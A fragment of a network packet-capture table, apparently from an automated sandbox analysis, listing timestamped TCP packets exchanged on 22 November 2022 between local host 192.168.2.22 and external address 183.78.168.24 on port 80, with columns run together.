                                                                                Nov 22, 2022 05:10:21.393776894 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.393796921 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.393973112 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.394444942 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.394489050 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.394499063 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.394556046 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.394604921 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.394642115 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.394757986 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.394804955 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.394865036 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.394990921 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.395031929 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.395036936 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.395126104 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.395167112 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.395172119 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.395816088 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.395900011 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.395908117 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.395939112 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.395983934 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.396018028 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.396091938 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.396140099 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.396207094 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.397461891 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.397517920 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.397533894 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.397612095 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.397661924 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.397701025 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.397800922 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.397847891 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.397857904 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.398044109 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.398087025 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.398089886 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.545466900 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.545535088 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.545536995 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.545578957 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.545619011 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.545622110 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.545659065 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.545700073 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.545700073 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.545747042 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.545785904 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.545785904 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.545913935 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.545953989 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.545959949 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.545993090 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.546034098 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.546103954 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.546210051 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.546255112 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.546283007 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.546446085 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.546485901 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.546495914 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.546564102 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.546611071 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.546642065 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.546717882 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.546763897 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.546823025 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.546952009 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.546994925 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.547002077 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.547152996 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.547194958 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.547211885 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.547234058 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.547276020 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.547334909 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.547455072 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.547494888 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.547502041 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.547597885 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.547646046 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.547697067 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.547813892 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.547854900 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.547863007 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.547967911 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.548013926 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.548041105 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.548161030 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.548209906 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.548268080 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.548345089 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.548391104 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.548409939 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.548485041 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.548531055 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.548633099 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.548687935 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.548733950 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.548814058 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.548899889 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.548943043 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.548976898 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.549051046 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.549098015 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.549166918 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.549793959 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.549837112 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.549851894 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.549964905 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.550014019 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.550045013 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.550122023 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.550165892 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.550224066 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.551384926 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.551424980 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.551438093 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.551511049 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.551554918 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.551606894 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.551738977 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.551781893 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.551786900 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.551879883 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.551924944 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.552026987 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.699894905 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.699961901 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.699994087 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.700002909 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.700052023 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.700088978 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.700095892 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.700136900 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.700170040 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.700176001 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.700217009 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.700259924 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.700346947 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.700421095 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.700454950 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.700495005 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.700577974 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.700617075 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.702013016 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.702111959 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.702148914 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.702156067 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.702235937 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.702239990 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.702276945 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.702318907 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.702357054 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.702384949 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.702424049 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.702464104 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.702481031 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.702521086 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.702559948 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.702562094 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.702636003 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.702677011 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.702685118 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.702733994 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.702749968 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.702794075 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.702835083 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.702862978 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.702951908 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.702992916 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.703025103 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.703032017 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.703088045 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.703102112 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.703144073 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.703183889 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.703212023 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.703241110 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.703289986 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.703315973 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.703340054 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.703366041 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.703382015 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.703439951 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.703450918 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.703494072 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.703533888 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.703562975 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.703593969 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.703634024 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.703661919 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.703672886 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.703741074 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.703743935 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.703787088 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.703826904 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.703852892 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.703890085 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.703931093 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.703958988 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.703999043 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.704104900 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.704144001 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.704179049 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.704183102 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.704252005 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.705357075 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.705450058 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.705528975 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.705538988 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.705615044 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.705688000 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.705710888 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.705822945 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.705892086 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.705893993 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.705967903 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.706034899 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.854276896 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.854357004 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.854429960 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.854434013 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.854563951 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.854620934 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.854624987 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.854666948 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.854721069 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.854724884 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.854767084 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.854804993 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.854809046 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.854862928 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.854924917 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.854954004 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.855073929 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.855127096 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.857985973 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.858066082 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.858119965 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.858119965 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.858149052 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.858191013 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.858244896 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.858274937 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.858315945 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.858377934 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.858448029 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.858489990 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.858550072 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.858627081 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.858669043 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.858736992 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.858819008 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.858865023 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.858869076 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.859019041 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.859066963 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.859097958 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.859138012 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.859179020 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.859266043 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.859333038 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.859379053 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.859428883 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.859497070 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.859539986 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.859675884 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.859704971 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.859746933 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.859778881 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.859909058 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.859936953 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.859951973 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.860052109 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.860095978 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.860148907 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.860215902 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.860259056 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.860296965 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.860375881 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.860419989 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.860467911 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.860536098 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.860578060 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.860641003 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.860781908 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.860816956 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.860824108 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.860941887 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.860984087 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.861020088 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.861095905 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.861135960 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.861193895 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.861299992 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.861342907 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.861377954 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.861444950 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.861494064 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.861640930 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.861670017 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.861727953 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.861793995 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.861821890 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.861864090 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.861891031 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.861984015 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.862040997 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:21.862102032 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.862140894 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:21.862183094 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.009135962 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.009215117 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.009258032 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.009287119 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.009318113 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.009377956 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.009378910 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.009421110 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.009480000 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.009481907 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.009521961 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.009583950 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.009701014 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.009742022 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.009782076 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.009795904 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.009840012 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:22.009896040 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:22.011987925 CET8049178183.78.168.24192.168.2.22
